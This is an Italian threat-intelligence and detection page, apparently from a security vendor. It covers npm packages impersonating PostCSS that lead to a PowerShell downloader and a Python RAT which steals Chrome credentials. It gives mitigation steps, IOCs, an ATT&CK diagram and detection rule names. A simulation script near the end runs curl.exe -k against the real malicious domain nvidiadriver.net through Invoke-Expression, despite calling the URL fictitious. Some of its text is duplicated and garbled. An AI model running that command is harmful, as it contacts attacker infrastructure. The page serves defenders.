PostCSS che si maschera come un percorso per la distribuzione di RAT su Windows
Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Gli aggressori stanno abusando dell’impersonificazione dei pacchetti npm per diffondere un RAT Windows a più fasi. Pacchetti malevoli come postcss-minify-selector-parser vengono presentati come legittimi strumenti di build per compromettere gli ambienti di sviluppo. Una volta attivata, la catena di infezione lancia un downloader PowerShell che recupera un RAT Python compilato con Nuitka in grado di rubare credenziali e fornire accesso alla shell remota.
Indagine
I ricercatori hanno scoperto un cluster di pacchetti npm malevoli che si riferiscono a dipendenze legittime per apparire credibili. L’indagine ha tracciato una catena di infezione stratificata che inizia con un dropper JavaScript, avanza a un downloader PowerShell e termina con un payload sofisticato basato su Python. Analizzando i componenti compilati con Nuitka, i ricercatori sono stati in grado di ricostruire il protocollo di comando e controllo del RAT e i comandi supportati.
Mitigazione
Gli utenti devono rimuovere immediatamente i pacchetti npm malevoli identificati e esaminare le dipendenze per qualsiasi esposizione transitiva. Le organizzazioni dovrebbero anche bloccare i domini e gli indirizzi IP di comando e controllo noti. Se si sospetta un compromesso, gli sviluppatori dovrebbero ruotare immediatamente le credenziali memorizzate nel browser e tutti i token correlati allo sviluppo.
Risposta
I punti finali di Windows devono essere esaminati per artefatti come %TEMP%winPatch, %TEMP%.store, e %TEMP%.host. Gli investigatori dovrebbero anche esaminare la persistenza nel registro HKCURun per il valore csshost . Deve essere condotto un audit completo delle postazioni di lavoro degli sviluppatori per identificare attività di shell remota non autorizzata o segni di furto di credenziali.
"graph TB %% Class Definitions classDef technique fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef persistence fill:#99ff99 %% Node Definitions attack_supply_chain["<b>Tecnica</b> – <b>T1195.001 Compromesso della catena di approvvigionamento: Compromesso delle dipendenze software e degli strumenti di sviluppo</b><br/><b>Descrizione</b>: Impersonificazione del pacchetto su npm tramite pacchetti simili come postcss-minify-selector-parser.<br/><b>Obiettivo</b>: Ambienti di sviluppo"] class attack_supply_chain technique attack_user_execution["<b>Tecnica</b> – <b>T1204.005 Esecuzione da parte dell’utente: Libreria malevola</b><br/><b>Descrizione</b>: Attivato quando il pacchetto npm malevolo viene importato.<br/><b>Azione</b>: Esegue un dropper JavaScript codificato."] class attack_user_execution technique process_powershell["<b>Tecnica</b> – <b>T1059.001 Interprete di comandi e script: PowerShell</b><br/><b>Descrizione</b>: PowerShell viene utilizzato per scrivere ed eseguire lo script malevolo.<br/><b>File</b>: ../../settings.ps1"] class process_powershell technique attack_indicator_removal["<b>Tecnica</b> – <b>T1070.010 Rimozione degli indicatori: Ricollocare malware</b><br/><b>Descrizione</b>: Utilizzo di un dominio ingannevole per scaricare il payload.<br/><b>Dominio</b>: nvidiadriver[.]net"] class attack_indicator_removal technique tool_cmd_shell["<b>Tecnica</b> – <b>T1059.003 Interprete di comandi e script: Shell dei comandi di Windows</b><br/><b>Descrizione</b>: Utilizzato per estrarre il bundle del payload.<br/><b>Trigger</b>: Esecuzione post-download."] class tool_cmd_shell technique malware_vbs_bootstrapper["<b>Malware</b> – <b>VBS Bootstrapper</b><br/><b>Descrizione</b>: Avvia il payload principale del malware."] class malware_vbs_bootstrapper malware malware_rat["<b>Malware</b> – <b>Strumento di accesso remoto (RAT)</b><br/><b>Descrizione</b>: Loader basato su Python che utilizza moduli compilati con Nuitka.<br/><b>Funzionalità</b>: Fornisce capacità di accesso remoto."] class malware_rat malware attack_persistence["<b>Tecnica</b> – <b>T1547.001 Esecuzione autostart del boot o accesso: Chiavi del registro / Cartella di avvio</b><br/><b>Descrizione</b>: Crea un valore del registro per la persistenza.<br/><b>Valore del registro</b>: csshost"] class attack_persistence persistence attack_evasion["<b>Tecnica</b> – <b>T1497.001 Evasione di virtualizzazione/sandbox: Controlli di sistema</b><br/><b>Descrizione</b>: Utilizza query WMI per rilevare ambienti virtuali.<br/><b>Comando</b>: wmic bios get serialnumber"] class attack_evasion technique attack_c2["<b>Tecnica</b> – <b>T1219 Strumenti di accesso remoto</b><br/><b>Descrizione</b>: Mantiene la comunicazione con il server C2 tramite pacchetti POST criptati.<br/><b>Indirizzo C2</b>: hxxp[:]//95[.]216[.]92[.]207:8080"] class attack_c2 technique attack_credential_access["<b>Tecnica</b> – <b>T1555.003 Credenziali dai negozi password: Credenziali dai browser Web</b><br/><b>Descrizione</b>: Ruba credenziali salvate da Chrome.<br/><b>File di destinazione</b>: Dati di accesso e stato locale"] class attack_credential_access technique %% Connections attack_supply_chain –>|porta a| attack_user_execution attack_user_execution –>|esegue| process_powershell process_powershell –>|esegue| attack_indicator_removal attack_indicator_removal –>|attiva| tool_cmd_shell tool_cmd_shell –>|avvia| malware_vbs_bootstrapper malware_vbs_bootstrapper –>|installa| malware_rat malware_rat –>|stabilisce| attack_persistence malware_rat –>|esegue| attack_evasion malware_rat –>|comunica tramite| attack_c2 malware_rat –>|esfiltra| attack_credential_access "
Flusso d’Attacco
Rilevamenti
LOLBAS WScript / CScript (via process_creation)
Visualizza
Utilizzo sospetto di CURL (via cmdline)
Visualizza
Possibile elencazione di sistema (via cmdline)
Visualizza
Un archivio è stato estratto in una directory sospetta usando Powershell (via powershell)
Visualizza
Script PowerShell che scarica un payload malevolo [Windows Powershell]
Visualizza
Rilevamento di connessione di rete malevola che imita un download di driver legittimo [Connessione di rete Windows]
Visualizza
Rilevamento di esecuzione di script PowerShell e loader malevolo [Creazione processo Windows]
Visualizza
## Esecuzione Simulazione
Prerequisito: Il controllo pre-volo Telemetria & Baseline deve aver superato.
Motivazione: Questa sezione descrive l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrativa di Attacco e Comandi: L’avversario intende stabilire un punto d’appoggio nel sistema mascherandosi come un processo di aggiornamento software legittimo. Per fare ciò, utilizza PowerShell per invocare l’utilità nativa
curl.exeutilizzando il flag-k(insicuro),bypassano la convalida dei certificati SSL, e specificando un percorso di destinazione inbypassano la convalida dei certificati SSL, e specificando un percorso di destinazione incon un nome file comecon un nome file come -
, cercano di mescolarsi nel rumore degli aggiornamenti di sistema routinari. L’obiettivo è scaricare un payload malevolo che, una volta eseguito, fornisce accesso remoto.
Script Test di Regressione: -
# Script di simulazione per attivare la specifica regola di rilevamento # Nota: Questo utilizza un URL fittizio per sicurezza, ma imita la struttura esatta richiesta dalla regola. $cmd = ‘curl.exe -k -o “$env:TEMPwinPatch.zip” https://nvidiadriver.net/verv1432/winpatch-xd7d.win’ Write-Host “Esecuzione del comando di download malevolo simulato…” Invoke-Expression $cmd
# Comandi di Pulizia: